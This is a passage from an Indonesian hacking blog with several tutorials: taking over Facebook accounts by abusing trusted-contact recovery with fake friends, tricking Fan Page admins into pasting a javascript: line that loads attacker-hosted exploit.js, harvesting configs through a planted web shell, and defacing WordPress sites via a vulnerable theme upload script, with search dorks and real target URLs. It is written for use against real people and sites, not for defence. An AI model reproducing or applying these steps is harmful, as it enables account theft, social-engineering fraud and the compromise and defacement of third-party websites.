Hack Facebook Menggunakan Trik 3 Teman Terpercaya

<div dir="ltr" style="text-align: left;" trbidi="on"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiM5ZVz7vTTHO84CtxHqROyXvH2jSKuPzEUPqUNDhYgCkH7zQZ1ka6rFzSPS3NSLEmHftSTZFh_4C55ygW-lhf5kkpXB6BbjcLSfwzZbDis6OoQNJL4DRajcnIcPLzTHd4JCPFWnwUTfI/s1600/fbhack2.bmp" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="150px" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiM5ZVz7vTTHO84CtxHqROyXvH2jSKuPzEUPqUNDhYgCkH7zQZ1ka6rFzSPS3NSLEmHftSTZFh_4C55ygW-lhf5kkpXB6BbjcLSfwzZbDis6OoQNJL4DRajcnIcPLzTHd4JCPFWnwUTfI/s1600/fbhack2.bmp" style="border: 0px solid rgb(238, 238, 238); box-shadow: 0px 0px 3px 0px rgba(0, 0, 0, 0.3); padding: 5px;" width="200px" /></a>Assalamualaikum...<br /><br />Sobat, saatnya bilang wow? Tunggu dulu sebelum sobat mencoba trik ini.. :p<br /><br />langsung ke topik,, hehehe :D<br /><br />Trik ini mudah saja, semua orang bisa melakukannya :p<br /><br />yang diperlukan adalah sobat harus memiliki beberapa akun facebook minimal tiga, tapi baiknya lebih dari 3 ;) buat saja akun facebook yang bnyak.. hehehehe dan usia akun facebook itu harus lebih dari 7 hari, kalo masih baru trik ini ga kan bekerja.. :p klo sudah punya beberapa akun, langsung saja berteman dengan target ;)jangan lupa, siapkan juga email yg baru.. ;)<br /><br />ini langkah2nya :<br /><br />1. buka facebook.com. lalu klik forgot password / Lupa Password<br /><br />2. lalu masukkan email atau username target.. klik search!<br /><br />3. kalo udah ketemu akun target? klik aja "Ini Akun saya"<br /><br />4. lalu pilih "Tidak lagi memiliki Akses ke sini"<br /><br />5. masukkan email yg telah disiapkan sobat tadi..<br /><br />6.  kemudian ada perintah untuk menjawab pertanyaan. jawab aja salah jg gpp ;)<br /><br />7. saatnya memilih 3 akun palsu yg kita buat sebelumnya.. klik "Selanjutnya" lalu pilih 3 teman, disini pilihlah 3 teman yaitu beberapa facebook palsu yg sobat persiapkan sebelumnya ;)<br /><br />8. lalu facebook akan mengirimkan kode keamanan ke 3 akun tadi,, kumpulkan kodenya lalu masukkan.. baiknya gunakan browser lain utk membuka 3 akun palsu sobat.. ;)<br /><br />9. setelah itu facebook akan mengirimkan "Password Recovery Email" atau Pemulihan akun ke email sobat tadi.. tinggal buka email, dan reset pasasword facebooknya.<br /><br />10. tarrraaa.. facebook udah bisa sobat kuasai.. :p<br /><br />Note: Sobat akan menemukan sedikit perbedaan  dalam trik ini pada saat mencobanya, jadi gunakan pikiranmu untuk mengembangkannya lagi.. :p<br /><br />Sekian Terimakasih ;) <br /><br /><br /><span style="color: red;"><b>UPDATE: Ini Trik lama, dan udah diperbaiki oleh pihak FB...  </b></span><br /><br /></div>

Hack Facebook Menggunakan Trik 3 Teman Terpercaya

Assalamualaikum... Sobat, saatnya bilang wow? Tunggu dulu sebelum sobat mencoba trik ini.. :p langsung ke topik,, hehehe :D Trik ini mudah s...

Baca selengkapnya »

Cara Hack FansPage Facebook

<div dir="ltr" style="text-align: left;" trbidi="on"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhW7ZtSHjhgRf66EN88S2Z0YJeUzyAatOZi0L_Ok8IllRkdDHVFUeCrD06gp59Csm_iaKp_HMgnR4A55IhgXBdcq9D-mR4YBjBNE7470HjHY6iPQtAvLgT8dhl27z3HAQ7F_mgL9fAQz9Ql/s1600/Cracked-Facebook-Logo.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="150px" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhW7ZtSHjhgRf66EN88S2Z0YJeUzyAatOZi0L_Ok8IllRkdDHVFUeCrD06gp59Csm_iaKp_HMgnR4A55IhgXBdcq9D-mR4YBjBNE7470HjHY6iPQtAvLgT8dhl27z3HAQ7F_mgL9fAQz9Ql/s1600/Cracked-Facebook-Logo.png" style="border: 0px solid rgb(238, 238, 238); box-shadow: 0px 0px 3px 0px rgba(0, 0, 0, 0.3); padding: 5px;" width="200px" /></a>Selamat pagi aja,, salam berbagi..<br /><br />Sekarang saya mau share sedikit tentang trik bagaimana cara hack fanspage. tapi sebelumnya saya tekankan bahwa "Akun facebook / Fanspage itu bisa di hack karna factor Human Error".. <br /><br />oke langsung saja deh.. :)<br /><br /><br />Hal-hal yang perlu dipersiapkan:<br /><br />1. Fanspage Exploit <a href="http://adfoc.us/10969621860610" target="_blank">Download  </a>Password: <a href="http://adfoc.us/10969624105782" target="_blank">Lihat</a><br /><br />2. Hostingan Gratis (idhostinger,nazuka,dll)<br /><br />3. Script Untuk Menjalankan Exploit<br /><br />4. Email ID Facebookmu<br /><br />5. Gunakan Otak (Pintar2) ;)<br /><br /><br />Langkah-Langkah:<br /><br />1. Edit exploit.js dengan notepad. cari bagian email ID, lalu ganti dengan email ID mu.. lalu save!<br /><br />2. Buatlah Hostingan di hosting gratis, Silahkan baca <a href="http://indocyberarmy.blogspot.com/2013/03/cara-membuat-hosting-gratis-di.html" target="_blank">Cara Membuat Hoting</a> lalu upload exploit.js dan pastikan upload di public_html.. http://sitekamu.hostingan.com/exploit.js<br /><br />3. Script untuk menjalankan Exploit.js yg sudah diupload di hostingan<br /><br /><span style="color: red;">javascript:(a = (b = document).createElement(“script”)).src = “http://sitekamu.hostingan.com/exploit.js“, b.body.appendChild(a); void(0)</span><br /><br />Sekarang kamu hanya butuh mengirimkan kode Script itu kepada Admin page agar mau menjalankan kode script itu di halaman fanspagenya dengan mengkopy kode script lalu dipastekan di adressbar browser.  katakan saja ini Autolike Fanspage atau terserah gimana caranya membodohinya.. wkwkwk :p <br /><br />Saran saja,, sebaiknya dicoba2 dulu karena saya tidak jamin exploit itu masih bekerja. mengingat sistem keamanan facebook yang terus diperketat.<br /><br />sekian, terimakasih</div>

Cara Hack FansPage Facebook

Selamat pagi aja,, salam berbagi.. Sekarang saya mau share sedikit tentang trik bagaimana cara hack fanspage. tapi sebelumnya saya tekankan ...

Baca selengkapnya »

Mencari Config Dalam Website

<br />Hi, ketemu lagi sama ane <span style="color: red;">./Cyber404</span> ^_^<br /><br />Kali ini aku mau kasih trik cara mendapatkan web yang 1 server sama web yang kita sudah pasang shell, kebanyakan nyebutnya <span style="color: red;">CONFIG</span>.<br /><br />Ya udah tanpa mengulur waktu langsung saja kita masuk ke tutorialnya :D<br /><br />[+] <span style="color: red;">BAHAN</span> [+]<br /><br /><ul><li>Shell (kalau belum punya download <a href="http://adf.ly/JcAYA" target="_blank">disini</a>)</li><li>MySQL (kalau belum punya klik <a href="http://adf.ly/JcAka" target="_blank">download</a>) #recode </li></ul><br /><br /><br /><br />1. Siapkan website yang udah kalian tanami shell/backdoor :D (sebagai contoh saya memakai http://sariamelia.com )<br /><br />2. Klik <span style="color: red;">EVAL</span> didalam shell/backdoor kalian (<span style="color: red;">lihat gambar</span>)<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg61u9UYjnrx36AX8PfqoCEJMEhJrjckxRKCVUkcz0yBGvCeqdfZz_lC5blCIReIOsm9JkSr6sWlXikzKL-3nHo1L2gPFJBEd7bnUoBkdPt-UEyjE7r_Ig-Irh5syk3EbFfq62E4OuVzK9W/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg61u9UYjnrx36AX8PfqoCEJMEhJrjckxRKCVUkcz0yBGvCeqdfZz_lC5blCIReIOsm9JkSr6sWlXikzKL-3nHo1L2gPFJBEd7bnUoBkdPt-UEyjE7r_Ig-Irh5syk3EbFfq62E4OuVzK9W/s400/1.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: left;">3. Jika sudah, lalu klik <span style="color: red;">GO </span>(<span style="color: red;">lihat gambar</span>)</div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbH1xXn72iKLPiURfp5YoZI8qKYrtvYdt2vXv3cDxnIlL5hJCM6BszNmLuU3j0ShQTmwYPW_pJGjF355lDE9XtwdMDuS9zP3phBPIQi0HnJcJGZ6rb6AlU-_ENC-jmksrluAuhbF9jZ_Yd/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbH1xXn72iKLPiURfp5YoZI8qKYrtvYdt2vXv3cDxnIlL5hJCM6BszNmLuU3j0ShQTmwYPW_pJGjF355lDE9XtwdMDuS9zP3phBPIQi0HnJcJGZ6rb6AlU-_ENC-jmksrluAuhbF9jZ_Yd/s400/2.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: left;">4. Lalu <span style="color: red;">copy</span> semua yang terdapat dalam kolom tersebut (<span style="color: red;">lihat gambar</span>)</div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8Y7iX1jDCS3jmSGvzgJcfW4pMJj_60d2MaO2Yvhwj14tIgDQ7zIGc5Tx5s33EicogajMqyP2aivFx68wkEWMKl9Z_KV0taQiKk9kOp9LPxmCYpEZPs3mJanUul4p4jXl8TL_YlcRcm6Ou/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8Y7iX1jDCS3jmSGvzgJcfW4pMJj_60d2MaO2Yvhwj14tIgDQ7zIGc5Tx5s33EicogajMqyP2aivFx68wkEWMKl9Z_KV0taQiKk9kOp9LPxmCYpEZPs3mJanUul4p4jXl8TL_YlcRcm6Ou/s400/3.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: left;">5. Next, kalian klik <span style="color: red;">CONFIG </span>(<span style="color: red;">tampilan seperti ini</span>)</div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6cY4Ssj4cisUAAeL17XZvCDVU3sl37E9Wnzft4E5FQDvz7UYn86QtWQv3v9yyb8i9f7YMk9wjgOTRX3N7zZ-nlQ_myCQ-L-UkYF_DcemjowJtsjEgNYh6LRGYXpTb9cE5NDkKihJ9ntBs/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6cY4Ssj4cisUAAeL17XZvCDVU3sl37E9Wnzft4E5FQDvz7UYn86QtWQv3v9yyb8i9f7YMk9wjgOTRX3N7zZ-nlQ_myCQ-L-UkYF_DcemjowJtsjEgNYh6LRGYXpTb9cE5NDkKihJ9ntBs/s400/4.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: left;">6. Lalu, <span style="color: red;">paste </span>kode yang kalian dapat (<span style="color: red;">step 4)</span> tadi di kolom yang disediakan (<span style="color: red;">lihat gambar</span>)</div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipINa3g7h_QzanU_-JsMqH-HzTlacvaPcxp0z2eIWlHicfjpevSmmTD8yfY_9XzTU0NmZMUxiHVXN9Bm-DB8NwwtKAD1XP4O2XB_Y3aDd4ns3wH8vuibbme14DV3bWaYcLFKf1kV2F1VhO/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipINa3g7h_QzanU_-JsMqH-HzTlacvaPcxp0z2eIWlHicfjpevSmmTD8yfY_9XzTU0NmZMUxiHVXN9Bm-DB8NwwtKAD1XP4O2XB_Y3aDd4ns3wH8vuibbme14DV3bWaYcLFKf1kV2F1VhO/s400/5.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: left;">7. Lalu klik <span style="color: red;">HAJAR, </span>jika sukses tampilan kurang lebih akan seperti ini</div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZ1wHjZ0xFrNi6n97BcBrh45_aLL1zpNXhhYH2yEE4OZkUJERs8Gim7P48aTL_k4pccQ8hMmSou3x2SK4pOISZaAR06Kkbn51MwLbJLAoFCBZpq2QHC6n0u0HZB_r_ZM2NxELj3RWs3hSd/s1600/6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZ1wHjZ0xFrNi6n97BcBrh45_aLL1zpNXhhYH2yEE4OZkUJERs8Gim7P48aTL_k4pccQ8hMmSou3x2SK4pOISZaAR06Kkbn51MwLbJLAoFCBZpq2QHC6n0u0HZB_r_ZM2NxELj3RWs3hSd/s400/6.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;">8. Sekarang tinggal kalian panggil <span style="color: red;">CONFIG</span>nya, caranya </div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;"># Jika kalian upload shell tadi di wp-content maka manggilnya <span style="color: red;">http://domain.com/wp-content/config</span></div><div class="separator" style="clear: both; text-align: left;"><span style="color: red;">*intinya ganti (nama shell kamu tadi dengan "config")</span></div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;">9. Jika sukses, tampilan akan seperti ini</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFyjvYIorl_vmeudJSGqEkbOkeVtfueSP3pzivfetv6vcs1bIzZ3TvbJ0YGDgcyjEyA3-Zk5CAtNdqfOrmqqPWy-7pBAldYWu4KnNEnAHYR0yBsJH2n_nATJIS9U_VawYMfWx-ME2RsaGE/s1600/7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFyjvYIorl_vmeudJSGqEkbOkeVtfueSP3pzivfetv6vcs1bIzZ3TvbJ0YGDgcyjEyA3-Zk5CAtNdqfOrmqqPWy-7pBAldYWu4KnNEnAHYR0yBsJH2n_nATJIS9U_VawYMfWx-ME2RsaGE/s400/7.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: left;">10. Sekarang tinggal upload script "mysql.php"nya :)</div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZ8HCkX3k-K97u3-6787ADjZpZCT3273wRaWGOEJbhS0ga98qujleaTKCObS0CKGdzYEXUeYBIf2_oltGhKu9I4XGkqte0joUUknhw2h91F0uXXCN15ZyUabHH0y-aeX4IwdmvYsN6MYFu/s1600/mysql.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZ8HCkX3k-K97u3-6787ADjZpZCT3273wRaWGOEJbhS0ga98qujleaTKCObS0CKGdzYEXUeYBIf2_oltGhKu9I4XGkqte0joUUknhw2h91F0uXXCN15ZyUabHH0y-aeX4IwdmvYsN6MYFu/s400/mysql.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: left;"><br /></div><br />Sekian tutorial dari ane <span style="color: red;">./Cyber404 </span>, kalo kurang jelas bisa tanyakan pada (<a href="http://facebook.com/cracker.indo" target="_blank">./Cyber404</a>)<br /><br />#yang belum tau cara deface dengan config silahkan <a href="http://indocyberarmy.blogspot.com/2013/01/deface-dengan-config.html" target="_blank">kesini gan :)</a><br /><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;"><span style="color: lime;">#</span><span style="color: red;">Special Thanks To</span><span style="color: lime;"> : </span><span style="color: blue;">Mr. Gandrunx | </span><span style="color: lime;">X Inject</span></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;">Keyword : <span style="color: #666666;">Hack Dengan Config . Cara Mencari Website Satu Server , Deface Website Mudah</span></div>

Mencari Config Dalam Website

Hi, ketemu lagi sama ane ./Cyber404 ^_^ Kali ini aku mau kasih trik cara mendapatkan web yang 1 server sama web yang kita sudah pasang shel...

Baca selengkapnya »

Deface Dengan CSRF (Cross Site Request Forgery)

<div dir="ltr" style="text-align: left;" trbidi="on">Assalamualaikum :)<br />Pada kesempatan kali ini aku mau kasih tutorial deface dengan tekhnik CSRF, oke tanpa basa basi kita mulai yah :D<br /><br />Bahan-Bahan:<br /><br />1. Download Script CSRF<br />===============================================================<br /><a href="http://adf.ly/JZyVV" target="_blank">DOWNLOAD DISINI</a>  Password: <a href="http://adfoc.us/10969624105782" target="_blank">Lihat</a><br />===============================================================<br />Note: Aktifkan Java Script untuk download!!<br /><br />2. Download MadspotShell <a href="http://adf.ly/JaQJN" target="_blank">Disini</a> Extract dulu dari file Rar!<br /><br />3. Cari target dengan DORK :<br /><ul><li>inurl:/wp-content/themes/shepard</li><li>inurl:/wp-content/themes/money</li><li>inurl:/wp-content/themes/clockstone</li><li>inurl:/wp-content/themes/ambleside</li><li>inurl:/wp-content/themes/pacifico</li></ul><div>#Dork dikembangkan sendiri ya :)<br /><br />4. Untuk coba2 gunakan <b><a href="http://adf.ly/LzS2y" target="_blank">Live Target </a>& <a href="http://adf.ly/LzS8K" target="_blank">Live Target 2</a></b><br /><br />5. Great Thanks To om<span style="color: lime;"> <b>Edo aka Mr. Goodday aka 007</b></span> Yg udh ngajarin :D<br /><br />6. Titip Nama :: <span style="color: red;">Indonesian Cyber Army ( IDCA ) |</span> <span style="color: blue;">Stealth Defacer Hacking Team (SDHT)</span></div><div><br /></div><div>#<span style="color: yellow;">Persiapan sudah selesai, sekarang tinggal kita eksekusi :)</span><br /><br /><span style="color: yellow;"><span style="color: black;">7. Download</span> <a href="http://aqua-dragon.blogspot.com/2013/05/deface-dengan-csrf-cross-site-request.html" target="_blank"><b style="color: lime;">Video Tutorial | Pass : onixidca </b></a></span></div><div><span style="color: red;"><br /></span><br /><b>Note:<span style="color: red;"> "Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"</span></b><br /><br /><span style="color: red;">Langkah- Langkah:</span><br /><span style="color: red;"><br /></span></div><div>1. Masukan Dork ke dalam google (<span style="color: red;">kurang jelas lihat gambar)</span></div><div><span style="color: red;"><br /></span></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh99k13t8Km8wkm3dkUWdJalEiAj3bZGJRaRvXt6IPl8PHW1Vm9QE7ZJRDd1mrkpcQKvr0ja4S0s-eN65BzIQALbG1eFENyECyxK6VjwUIR5xX0oW8B3UNZlz_7Nv6VYhF8KMw_6OaqFOvk/s1600/DORK.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="257" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh99k13t8Km8wkm3dkUWdJalEiAj3bZGJRaRvXt6IPl8PHW1Vm9QE7ZJRDd1mrkpcQKvr0ja4S0s-eN65BzIQALbG1eFENyECyxK6VjwUIR5xX0oW8B3UNZlz_7Nv6VYhF8KMw_6OaqFOvk/s400/DORK.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: left;">2. Pilih salah satu target yang kita dapat tadi (<span style="color: red;">Kurang jelas lihat gambar</span>)</div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4tIA0IKtMTuDlceuEIHfko78EfkKuF5z3nvRgSjkRRsIaYfcl4PcC3MbFIdgb950nDOE_0jc1uIiLueCRtLfvVW6fTaZbLTvja6iMDozgNwKVkmtz8ubsKdywzv67YO-vYZuxbiFF6Wi8/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="192" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4tIA0IKtMTuDlceuEIHfko78EfkKuF5z3nvRgSjkRRsIaYfcl4PcC3MbFIdgb950nDOE_0jc1uIiLueCRtLfvVW6fTaZbLTvja6iMDozgNwKVkmtz8ubsKdywzv67YO-vYZuxbiFF6Wi8/s320/1.png" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: left;">Contoh :</div><div class="separator" style="clear: both; text-align: left;"><span style="color: blue;">http://www.robertcarpentry.com/wp-content/themes/pacifico/</span>images/ ganti menjadi <span style="color: blue;">http://www.robertcarpentry.com/wp-content/themes/pacifico/</span><span style="color: red;">theme</span></div><div class="separator" style="clear: both; text-align: left;"><span style="color: red;"><br /></span></div><div class="separator" style="clear: both; text-align: left;">3. Klik folder "Function" lalu klik file "Upload-bg.php" / "uploadbg.php" / "upload.php"</div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;">Note: Jika muncul "You Must Login....."atau blank? cari target lain!! :p  "Jika muncul "error" berarti Web target Vulnerable" ;p</div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;">4. Buka file CSRF.html yang tadi sudah di download dengan notepad, ganti URLTARGET  dengan link yang berada di addres bar target kamu tadi. Lihat Gambar! lalu save!</div><div class="separator" style="clear: both; text-align: left;">Contoh: "<span style="color: blue;">http://www.robertcarpentry.com/wp-content/themes/pacifico/theme/functions/upload-bg.php"</span></div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0N9u3yo3Wwe0_Rt4yIu_DPw_2UOCxF73ur2LPscDOkVuXLI-aqwTi1a7aYhKAsL0Y9w5tg-lYorpPft1xJMLlr5XWrEECk9X6BOK5EHOqtW-Dec2TmDGRjQKWLCmTG7NFPMjDi7GT-GR4/s1600/New+Picture+%2828%29.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="139" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0N9u3yo3Wwe0_Rt4yIu_DPw_2UOCxF73ur2LPscDOkVuXLI-aqwTi1a7aYhKAsL0Y9w5tg-lYorpPft1xJMLlr5XWrEECk9X6BOK5EHOqtW-Dec2TmDGRjQKWLCmTG7NFPMjDi7GT-GR4/s320/New+Picture+%2828%29.jpg" width="320" /></a></div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmUv198WG-Su53b-No4_6133Z6SkStSSIu-84J0afk3YBMEKwlK6PAmmufagBlKiRdbdMr4HYC5hKLkIbmk14I2TdDcRwWN5_kuC1igX14DdD3T54ThY95E93gFmUQuw0E1j-xTdJFZpIo/s1600/New+Picture+%2832%29.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="72" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmUv198WG-Su53b-No4_6133Z6SkStSSIu-84J0afk3YBMEKwlK6PAmmufagBlKiRdbdMr4HYC5hKLkIbmk14I2TdDcRwWN5_kuC1igX14DdD3T54ThY95E93gFmUQuw0E1j-xTdJFZpIo/s320/New+Picture+%2832%29.bmp" width="320" /></a></div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;">5. Buka file CSRF.html, akan muncul upload file. lalu Pilih Madspotshell.php lalu klik upload .</div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTb4YPY36ryd8kMNxSrxuB_1XuL-YlA2fa3g-O_XZXeKGfh2JzT5lFNW2H2gdlK_rOHJVheeNP5KT6ZOLby6TvudOKMR5W11VY0nGGlaJA1Z-RrQYcGZ9t063WLSoPjDUDZ230HshduTM/s1600/New+Picture+%286%29.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTb4YPY36ryd8kMNxSrxuB_1XuL-YlA2fa3g-O_XZXeKGfh2JzT5lFNW2H2gdlK_rOHJVheeNP5KT6ZOLby6TvudOKMR5W11VY0nGGlaJA1Z-RrQYcGZ9t063WLSoPjDUDZ230HshduTM/s320/New+Picture+%286%29.bmp" width="320" /></a></div><div class="separator" style="clear: both; text-align: left;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;">Jika berhasil maka akan muncul seperti ini (<span style="color: red;">lihat gambar</span>)</div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAnjGCTR-_-dmx-OcVhfXCb3iaa84EcBWT447p84Vqhrz9NfraBiytOoOA9sTG62BA1TfJ0BscAuWTK0HhW_AKa_3EB5uDrfKwAQZyHt0YPBeYp3PR3JAyb3XeDFw-K9fD8Ph_P0vuUblG/s1600/hampir.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="192" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAnjGCTR-_-dmx-OcVhfXCb3iaa84EcBWT447p84Vqhrz9NfraBiytOoOA9sTG62BA1TfJ0BscAuWTK0HhW_AKa_3EB5uDrfKwAQZyHt0YPBeYp3PR3JAyb3XeDFw-K9fD8Ph_P0vuUblG/s320/hampir.png" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: left;">6. Udah diganti ? dan jika berhasil maka tampilannya akan jadi seperti ini</div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdZLxKXWnKxmIbMXS6o9tcxFjewjxr0W85tFZEo0LWrfmey2RV7qdn1qb417jVmbQJWrJPJe1I8WO3X1qMqk8na6JiDFa4pc6jwypIXTeqYzKOv2jpZnHc_Q2PxhJUURNGBebuCvOTBaGN/s1600/sukses.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="192" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdZLxKXWnKxmIbMXS6o9tcxFjewjxr0W85tFZEo0LWrfmey2RV7qdn1qb417jVmbQJWrJPJe1I8WO3X1qMqk8na6JiDFa4pc6jwypIXTeqYzKOv2jpZnHc_Q2PxhJUURNGBebuCvOTBaGN/s320/sukses.png" width="320" /></a></div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;">#itu tandanya shell backdoor kamu sudah terpasang :D sekarang terserah mau kamu apain website itu :)</div><br />#<span style="color: cyan;">Saya menggunakan SHELL dari teman saya om X Inject :D (</span>tampilan shell akan berbeda beda loh setiap jenisnya)<br /><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;">Tampilan madspotshell::</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvI-NOCL038Bm6dEu6ciBPEWWljuYXCjzeGalxiHs5vZTq4-GfgEOopaj7SWL_xiEyobcuuxkvtPQtLnRjFCpcOrMIRKqZvcHgQY8aycteDXkEKVswZzCc35QRvJGYbacq__KEixGWJsdg/s1600/New+Picture+%2819%29.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="155" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvI-NOCL038Bm6dEu6ciBPEWWljuYXCjzeGalxiHs5vZTq4-GfgEOopaj7SWL_xiEyobcuuxkvtPQtLnRjFCpcOrMIRKqZvcHgQY8aycteDXkEKVswZzCc35QRvJGYbacq__KEixGWJsdg/s320/New+Picture+%2819%29.jpg" width="320" /></a></div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;">7. Untuk eksekusi Index, silahkan lihat<b> <a href="http://indocyberarmy.blogspot.com/2013/03/cara-tebas-index-website.html" target="_blank">Cara Tebas Index Website Wordpress</a></b></div><br /><div><span style="color: red;">Sekian tutor yang dapat saya 